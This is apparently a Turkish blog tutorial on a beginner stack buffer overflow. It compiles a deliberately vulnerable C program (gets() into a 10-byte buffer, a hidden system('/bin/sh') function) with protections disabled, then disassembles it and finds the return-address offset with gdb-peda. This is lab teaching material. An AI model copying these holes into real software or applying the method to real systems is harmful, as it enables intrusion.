I"K]<h1 id="şamata-yapmadan-direktman-mevzuya-dalacağım">Şamata yapmadan direktman mevzuya dalacağım.</h1>
<hr />
<h1 id="aşağıdaki-gibi-bir-c-kodu-hazırlayıp-derleyelim">Aşağıdaki gibi bir C kodu hazırlayıp derleyelim.</h1>
<hr />
<div class="language-c++ highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">olmekten_degil_lan_acidan_korkuyom</span><span class="p">()</span> <span class="p">{</span>
  <span class="n">printf</span><span class="p">(</span><span class="s">"BURAK YILMAZIN ANNE SEVGISI"</span><span class="p">);</span>
  <span class="n">system</span><span class="p">(</span><span class="s">"/bin/sh"</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">char</span> <span class="n">sikinti</span><span class="p">[</span><span class="mi">10</span><span class="p">];</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"ANNEEEE</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">gets</span><span class="p">(</span><span class="n">sikinti</span><span class="p">);</span>
    <span class="n">strcmp</span><span class="p">(</span><span class="n">gets</span><span class="p">,</span> <span class="n">sikinti</span><span class="p">);</span>
    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<hr />
<div class="language-zsh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sesh at ASKE <span class="k">in</span> ~/Desktop 
<span class="nv">$ </span>gcc <span class="nt">-fno-stack-protector</span> <span class="nt">-z</span> execstack <span class="nt">-no-pie</span> rop.c <span class="nt">-o</span> rop
sesh at ASKE <span class="k">in</span> ~/Desktop 
<span class="nv">$ </span>file rop
rop: ELF 64-bit LSB executable, x86-64, version 1 <span class="o">(</span>SYSV<span class="o">)</span>, dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]<span class="o">=</span>109245b75ae015328ce33fdb566b536d4b8307ad, <span class="k">for </span>GNU/Linux 3.2.0, not stripped
</code></pre></div></div>
<hr />
<h1 id="şimdi-bu-kod-nabıyo-">Şimdi bu kod n’abıyo ?</h1>
<hr />
<h3 id="10-bytelık-değeri-sikinti-değişkeninde-tanımlayıp-burak-yılmazın-anne-sevgisini-hatırlamamız-için-ekrana-anneeee-bastırıyor-gets-ile-inputu-alıp-strcmp-ile-karşılaştırma-yapıyor-ve-return-0-ile-program-sonlanıyor-en-tepede-ölmekten-korkmayan-dostumuz-için-binsh-i-çağıran-bir-system-fonksiyonu-tanımlanıyor">10 byte’lık değeri sikinti değişkeninde tanımlayıp, burak yılmazın anne sevgisini hatırlamamız için ekrana ANNEEEE bastırıyor. Gets ile inputu alıp, strcmp ile karşılaştırma yapıyor ve return 0 ile program sonlanıyor. En tepede ölmekten korkmayan dostumuz için /bin/sh’ i çağıran bir system fonksiyonu tanımlanıyor.</h3>
<hr />
<h1 id="girelim-bakalım-mevzuya">Girelim bakalım, mevzuya</h1>
<hr />
<div class="language-zsh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sesh at ASKE <span class="k">in</span> ~/Desktop 
<span class="nv">$ </span>radare2 rop
 <span class="nt">--</span> Microloft Visual Radare.NET 2008. Now OOXML Powered!
</code></pre></div></div>
<div class="language-c++ highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">[</span><span class="mh">0x00401070</span><span class="p">]</span><span class="o">&gt;</span> <span class="n">aaaaaa</span>
<span class="p">[</span><span class="n">x</span><span class="p">]</span> <span class="n">Analyze</span> <span class="n">all</span> <span class="n">flags</span> <span class="n">starting</span> <span class="n">with</span> <span class="n">sym</span><span class="p">.</span> <span class="n">and</span> <span class="n">entry0</span> <span class="p">(</span><span class="n">aa</span><span class="p">)</span>
<span class="p">[</span><span class="n">x</span><span class="p">]</span> <span class="n">Analyze</span> <span class="n">function</span> <span class="n">calls</span> <span class="p">(</span><span class="n">aac</span><span class="p">)</span>
<span class="p">[</span><span class="n">x</span><span class="p">]</span> <span class="n">Analyze</span> <span class="n">len</span> <span class="n">bytes</span> <span class="n">of</span> <span class="n">instructions</span> <span class="k">for</span> <span class="n">references</span> <span class="p">(</span><span class="n">aar</span><span class="p">)</span>
<span class="p">[</span><span class="n">x</span><span class="p">]</span> <span class="n">Check</span> <span class="k">for</span> <span class="n">objc</span> <span class="n">references</span>
<span class="p">[</span><span class="n">x</span><span class="p">]</span> <span class="n">Check</span> <span class="k">for</span> <span class="n">vtables</span>
<span class="p">[</span><span class="n">x</span><span class="p">]</span> <span class="n">Type</span> <span class="n">matching</span> <span class="n">analysis</span> <span class="k">for</span> <span class="n">all</span> <span class="n">functions</span> <span class="p">(</span><span class="n">aaft</span><span class="p">)</span>
<span class="p">[</span><span class="n">x</span><span class="p">]</span> <span class="n">Propagate</span> <span class="n">noreturn</span> <span class="n">information</span>
<span class="p">[</span><span class="n">x</span><span class="p">]</span> <span class="n">Use</span> <span class="o">-</span><span class="n">AA</span> <span class="n">or</span> <span class="n">aaaa</span> <span class="n">to</span> <span class="n">perform</span> <span class="n">additional</span> <span class="n">experimental</span> <span class="n">analysis</span><span class="p">.</span>
<span class="p">[</span><span class="n">x</span><span class="p">]</span> <span class="n">Finding</span> <span class="n">function</span> <span class="n">preludes</span>
<span class="p">[</span><span class="n">x</span><span class="p">]</span> <span class="n">Enable</span> <span class="n">constraint</span> <span class="n">types</span> <span class="n">analysis</span> <span class="k">for</span> <span class="n">variables</span>
<span class="p">[</span><span class="mh">0x00401070</span><span class="p">]</span><span class="o">&gt;</span> 
</code></pre></div></div>
<h1 id="6-dan-fazla-a-basmayın-yoksa-kapınıza-polis-geliyor">6 dan fazla a basmayın yoksa kapınıza polis geliyor.</h1>
<hr />
<div class="language-c++ highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">[</span><span class="mh">0x00401070</span><span class="p">]</span><span class="o">&gt;</span> <span class="n">afl</span>
<span class="mh">0x00401070</span>    <span class="mi">1</span> <span class="mi">46</span>           <span class="n">entry0</span>
<span class="mh">0x004010b0</span>    <span class="mi">4</span> <span class="mi">33</span>           <span class="n">sym</span><span class="p">.</span><span class="n">deregister_tm_clones</span>
<span class="mh">0x004010e0</span>    <span class="mi">4</span> <span class="mi">57</span>   <span class="o">-&gt;</span> <span class="mi">51</span>   <span class="n">sym</span><span class="p">.</span><span class="n">register_tm_clones</span>
<span class="mh">0x00401120</span>    <span class="mi">3</span> <span class="mi">33</span>   <span class="o">-&gt;</span> <span class="mi">32</span>   <span class="n">entry</span><span class="p">.</span><span class="n">fini0</span>
<span class="mh">0x00401150</span>    <span class="mi">1</span> <span class="mi">6</span>            <span class="n">entry</span><span class="p">.</span><span class="n">init0</span>
<span class="mh">0x00401230</span>    <span class="mi">1</span> <span class="mi">5</span>            <span class="n">sym</span><span class="p">.</span><span class="n">__libc_csu_fini</span>
<span class="mh">0x00401238</span>    <span class="mi">1</span> <span class="mi">13</span>           <span class="n">sym</span><span class="p">.</span><span class="n">_fini</span>
<span class="mh">0x00401156</span>    <span class="mi">1</span> <span class="mi">41</span>           <span class="n">sym</span><span class="p">.</span><span class="n">olmekten_degil_lan_acidan_korkuyom</span>
<span class="mh">0x00401050</span>    <span class="mi">1</span> <span class="mi">6</span>            <span class="n">sym</span><span class="p">.</span><span class="n">imp</span><span class="p">.</span><span class="n">printf</span>
<span class="mh">0x00401040</span>    <span class="mi">1</span> <span class="mi">6</span>            <span class="n">sym</span><span class="p">.</span><span class="n">imp</span><span class="p">.</span><span class="n">system</span>
<span class="mh">0x004011c0</span>    <span class="mi">4</span> <span class="mi">101</span>          <span class="n">sym</span><span class="p">.</span><span class="n">__libc_csu_init</span>
<span class="mh">0x004010a0</span>    <span class="mi">1</span> <span class="mi">5</span>            <span class="n">sym</span><span class="p">.</span><span class="n">_dl_relocate_static_pie</span>
<span class="mh">0x0040117f</span>    <span class="mi">1</span> <span class="mi">51</span>           <span class="n">main</span>
<span class="mh">0x00401030</span>    <span class="mi">1</span> <span class="mi">6</span>            <span class="n">sym</span><span class="p">.</span><span class="n">imp</span><span class="p">.</span><span class="n">puts</span>
<span class="mh">0x00401060</span>    <span class="mi">1</span> <span class="mi">6</span>            <span class="n">sym</span><span class="p">.</span><span class="n">imp</span><span class="p">.</span><span class="n">gets</span>
<span class="mh">0x00401000</span>    <span class="mi">3</span> <span class="mi">27</span>           <span class="n">sym</span><span class="p">.</span><span class="n">_init</span>
<span class="p">[</span><span class="mh">0x00401070</span><span class="p">]</span><span class="o">&gt;</span> 
</code></pre></div></div>
<hr />
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">[0x00401070]</span><span class="o">&gt;</span> <span class="n">pdf</span> <span class="err">@</span><span class="n">main</span>
<span class="err">┌</span> <span class="mi">51</span><span class="o">:</span> <span class="k">int</span> <span class="n">main</span> <span class="p">(</span><span class="k">int</span> <span class="n">argc</span><span class="p">,</span> <span class="n">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">,</span> <span class="n">char</span> <span class="o">**</span><span class="n">envp</span><span class="p">)</span><span class="c">;</span>
<span class="err">│</span>           <span class="c">; var char **var_20h @ rbp-0x20</span>
<span class="err">│</span>           <span class="c">; var int64_t var_14h @ rbp-0x14</span>
<span class="err">│</span>           <span class="c">; var char *s @ rbp-0xa</span>
<span class="err">│</span>           <span class="c">; arg int argc @ rdi</span>
<span class="err">│</span>           <span class="c">; arg char **argv @ rsi</span>
<span class="err">│</span>           <span class="c">; DATA XREF from entry0 @ 0x401091</span>
<span class="err">│</span>           <span class="mh">0x0040117f</span>      <span class="mi">55</span>             <span class="k">push</span> <span class="n">rbp</span>
<span class="err">│</span>           <span class="mh">0x00401180</span>      <span class="mi">4889</span><span class="n">e5</span>         <span class="k">mov</span> <span class="n">rbp</span><span class="p">,</span> <span class="n">rsp</span>
<span class="err">│</span>           <span class="mh">0x00401183</span>      <span class="mi">4883</span><span class="n">ec20</span>       <span class="k">sub</span> <span class="n">rsp</span><span class="p">,</span> <span class="mh">0x20</span>
<span class="err">│</span>           <span class="mh">0x00401187</span>      <span class="mi">897</span><span class="k">dec</span>         <span class="k">mov</span> <span class="n">dword</span> <span class="err">[</span><span class="n">var_14h</span><span class="err">]</span><span class="p">,</span> <span class="n">edi</span>    <span class="c">; argc</span>
<span class="err">│</span>           <span class="mh">0x0040118a</span>      <span class="mi">488975</span><span class="n">e0</span>       <span class="k">mov</span> <span class="n">qword</span> <span class="err">[</span><span class="n">var_20h</span><span class="err">]</span><span class="p">,</span> <span class="n">rsi</span>    <span class="c">; argv</span>
<span class="err">│</span>           <span class="mh">0x0040118e</span>      <span class="mi">488</span><span class="n">d3d930e00</span><span class="p">.</span>  <span class="k">lea</span> <span class="n">rdi</span><span class="p">,</span> <span class="k">str</span><span class="p">.</span><span class="n">ANNEEEE</span>        <span class="c">; 0x402028 ; "ANNEEEE" ; const char *s</span>
<span class="err">│</span>           <span class="mh">0x00401195</span>      <span class="n">e896feffff</span>     <span class="k">call</span> <span class="n">sym</span><span class="p">.</span><span class="n">imp</span><span class="p">.</span><span class="n">puts</span>           <span class="c">; int puts(const char *s)</span>
<span class="err">│</span>           <span class="mh">0x0040119a</span>      <span class="mi">488</span><span class="n">d45f6</span>       <span class="k">lea</span> <span class="n">rax</span><span class="p">,</span> <span class="p">[s]</span>
<span class="err">│</span>           <span class="mh">0x0040119e</span>      <span class="mi">4889</span><span class="n">c7</span>         <span class="k">mov</span> <span class="n">rdi</span><span class="p">,</span> <span class="n">rax</span>                <span class="c">; char *s</span>
<span class="err">│</span>           <span class="mh">0x004011a1</span>      <span class="n">b800000000</span>     <span class="k">mov</span> <span class="n">eax</span><span class="p">,</span> <span class="mi">0</span>
<span class="err">│</span>           <span class="mh">0x004011a6</span>      <span class="n">e8b5feffff</span>     <span class="k">call</span> <span class="n">sym</span><span class="p">.</span><span class="n">imp</span><span class="p">.</span><span class="n">gets</span>           <span class="c">; char *gets(char *s)</span>
<span class="err">│</span>           <span class="mh">0x004011ab</span>      <span class="n">b800000000</span>     <span class="k">mov</span> <span class="n">eax</span><span class="p">,</span> <span class="mi">0</span>
<span class="err">│</span>           <span class="mh">0x004011b0</span>      <span class="n">c9</span>             <span class="k">leave</span>
<span class="err">└</span>           <span class="mh">0x004011b1</span>      <span class="n">c3</span>             <span class="k">ret</span>
<span class="p">[0x00401070]</span><span class="o">&gt;</span> 
</code></pre></div></div>
<hr />
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">[0x00401070]</span><span class="o">&gt;</span> <span class="n">pdf</span> <span class="err">@</span><span class="n">sym</span><span class="p">.</span><span class="n">olmekten_degil_lan_acidan_korkuyom</span>
<span class="err">┌</span> <span class="mi">41</span><span class="o">:</span> <span class="n">sym</span><span class="p">.</span><span class="n">olmekten_degil_lan_acidan_korkuyom</span> <span class="p">()</span><span class="c">;</span>
<span class="err">│</span>           <span class="mh">0x00401156</span>      <span class="mi">55</span>             <span class="k">push</span> <span class="n">rbp</span>
<span class="err">│</span>           <span class="mh">0x00401157</span>      <span class="mi">4889</span><span class="n">e5</span>         <span class="k">mov</span> <span class="n">rbp</span><span class="p">,</span> <span class="n">rsp</span>
<span class="err">│</span>           <span class="mh">0x0040115a</span>      <span class="mi">488</span><span class="n">d3da30e00</span><span class="p">.</span>  <span class="k">lea</span> <span class="n">rdi</span><span class="p">,</span> <span class="k">str</span><span class="p">.</span><span class="n">BURAK_YILMAZIN_ANNE_SEVGISI</span> <span class="c">; 0x402004 ; "BURAK YILMAZIN ANNE SEVGISI" ; const char *format</span>
<span class="err">│</span>           <span class="mh">0x00401161</span>      <span class="n">b800000000</span>     <span class="k">mov</span> <span class="n">eax</span><span class="p">,</span> <span class="mi">0</span>
<span class="err">│</span>           <span class="mh">0x00401166</span>      <span class="n">e8e5feffff</span>     <span class="k">call</span> <span class="n">sym</span><span class="p">.</span><span class="n">imp</span><span class="p">.</span><span class="n">printf</span>         <span class="c">; int printf(const char *format)</span>
<span class="err">│</span>           <span class="mh">0x0040116b</span>      <span class="mi">488</span><span class="n">d3dae0e00</span><span class="p">.</span>  <span class="k">lea</span> <span class="n">rdi</span><span class="p">,</span> <span class="k">str</span><span class="p">.</span><span class="n">bin_sh</span>         <span class="c">; 0x402020 ; "/bin/sh" ; const char *string</span>
<span class="err">│</span>           <span class="mh">0x00401172</span>      <span class="n">b800000000</span>     <span class="k">mov</span> <span class="n">eax</span><span class="p">,</span> <span class="mi">0</span>
<span class="err">│</span>           <span class="mh">0x00401177</span>      <span class="n">e8c4feffff</span>     <span class="k">call</span> <span class="n">sym</span><span class="p">.</span><span class="n">imp</span><span class="p">.</span><span class="n">system</span>         <span class="c">; int system(const char *string)</span>
<span class="err">│</span>           <span class="mh">0x0040117c</span>      <span class="mi">90</span>             <span class="k">nop</span>
<span class="err">│</span>           <span class="mh">0x0040117d</span>      <span class="mi">5</span><span class="n">d</span>             <span class="k">pop</span> <span class="n">rbp</span>
<span class="err">└</span>           <span class="mh">0x0040117e</span>      <span class="n">c3</span>             <span class="k">ret</span>
<span class="p">[0x00401070]</span><span class="o">&gt;</span> 
</code></pre></div></div>
<hr />
<h1 id="her-yerde-burak-yılmazı-gördüğümüz-için-artık-başlayabiliriz">Her yerde burak yılmazı gördüğümüz için artık başlayabiliriz</h1>
<hr />
<p>#</p>
<div class="language-zsh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sesh at ASKE <span class="k">in</span> ~/Desktop 
<span class="nv">$ </span>gdb <span class="nt">-q</span> rop
Reading symbols from rop...
<span class="o">(</span>No debugging symbols found <span class="k">in </span>rop<span class="o">)</span>
gdb-peda<span class="nv">$ </span>checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : disabled
PIE       : disabled
RELRO     : Partial
gdb-peda<span class="err">$</span>
</code></pre></div></div>
<div class="language-zsh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gdb-peda<span class="nv">$ </span>pattern_create 30
<span class="s1">'AAA%AAsAABAA$AAnAACAA-AA(AADAA'</span>
gdb-peda<span class="nv">$ </span>r
Starting program: /home/sesh/Desktop/rop 
ANNEEEE
<span class="s1">'AAA%AAsAABAA$AAnAACAA-AA(AADAA'</span>

Program received signal SIGSEGV, Segmentation fault.
<span class="o">[</span><span class="nt">----------------------------------registers-----------------------------------</span><span class="o">]</span>
RAX: 0x0 
RBX: 0x0 
RCX: 0x7ffff7f8e7e0 <span class="nt">--</span><span class="o">&gt;</span> 0xfbad2288 
RDX: 0x0 
RSI: 0x4056b1 <span class="o">(</span><span class="s2">"AAA%AAsAABAA</span><span class="nv">$AAnAACAA</span><span class="s2">-AA(AADAA'</span><span class="se">\n</span><span class="s2">"</span><span class="o">)</span>
RDI: 0x7ffff7f91330 <span class="nt">--</span><span class="o">&gt;</span> 0x0 
RBP: 0x416e414124414142 <span class="o">(</span><span class="s1">'BAA$AAnA'</span><span class="o">)</span>
RSP: 0x7fffffffdff8 <span class="o">(</span><span class="s2">"ACAA-AA(AADAA'"</span><span class="o">)</span>
RIP: 0x4011b1 <span class="o">(</span>&lt;main+50&gt;:	ret<span class="o">)</span>
R8 : 0x7fffffffdfe6 <span class="o">(</span><span class="s2">"'AAA%AAsAABAA</span><span class="nv">$AAnAACAA</span><span class="s2">-AA(AADAA'"</span><span class="o">)</span>
R9 : 0x0 
R10: 0x410 
R11: 0x246 
R12: 0x401070 <span class="o">(</span>&lt;_start&gt;:	endbr64<span class="o">)</span>
R13: 0x7fffffffe0d0 <span class="nt">--</span><span class="o">&gt;</span> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x10202 <span class="o">(</span>carry parity adjust zero sign <span class="nb">trap </span>INTERRUPT direction overflow<span class="o">)</span>
<span class="o">[</span><span class="nt">-------------------------------------code-------------------------------------</span><span class="o">]</span>
   0x4011a6 &lt;main+39&gt;:	call   0x401060 &lt;gets@plt&gt;
   0x4011ab &lt;main+44&gt;:	mov    eax,0x0
   0x4011b0 &lt;main+49&gt;:	leave  
<span class="o">=&gt;</span> 0x4011b1 &lt;main+50&gt;:	ret    
   0x4011b2:	nop    WORD PTR cs:[rax+rax<span class="k">*</span>1+0x0]
   0x4011bc:	nop    DWORD PTR <span class="o">[</span>rax+0x0]
   0x4011c0 &lt;__libc_csu_init&gt;:	endbr64 
   0x4011c4 &lt;__libc_csu_init+4&gt;:	push   r15
<span class="o">[</span><span class="nt">------------------------------------stack-------------------------------------</span><span class="o">]</span>
0000| 0x7fffffffdff8 <span class="o">(</span><span class="s2">"ACAA-AA(AADAA'"</span><span class="o">)</span>
0008| 0x7fffffffe000 <span class="nt">--</span><span class="o">&gt;</span> 0x274141444141 <span class="o">(</span><span class="s2">"AADAA'"</span><span class="o">)</span>
0016| 0x7fffffffe008 <span class="nt">--</span><span class="o">&gt;</span> 0x7fffffffe0d8 <span class="nt">--</span><span class="o">&gt;</span> 0x7fffffffe41d <span class="o">(</span><span class="s2">"/home/sesh/Desktop/rop"</span><span class="o">)</span>
0024| 0x7fffffffe010 <span class="nt">--</span><span class="o">&gt;</span> 0x100040000 
0032| 0x7fffffffe018 <span class="nt">--</span><span class="o">&gt;</span> 0x40117f <span class="o">(</span>&lt;main&gt;:	push   rbp<span class="o">)</span>
0040| 0x7fffffffe020 <span class="nt">--</span><span class="o">&gt;</span> 0x0 
0048| 0x7fffffffe028 <span class="nt">--</span><span class="o">&gt;</span> 0x12149a401f07ff21 
0056| 0x7fffffffe030 <span class="nt">--</span><span class="o">&gt;</span> 0x401070 <span class="o">(</span>&lt;_start&gt;:	endbr64<span class="o">)</span>
<span class="o">[</span><span class="nt">------------------------------------------------------------------------------</span><span class="o">]</span>
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00000000004011b1 <span class="k">in </span>main <span class="o">()</span>
gdb-peda<span class="nv">$ </span>x/xg <span class="nv">$rsp</span>
0x7fffffffdff8:	0x2841412d41414341
gdb-peda<span class="nv">$ </span>pattern_offset 0x2841412d41414341
2900671297627439937 found at offset: 17
gdb-peda<span class="nv">$ </span>
</code></pre></div></div>
:ET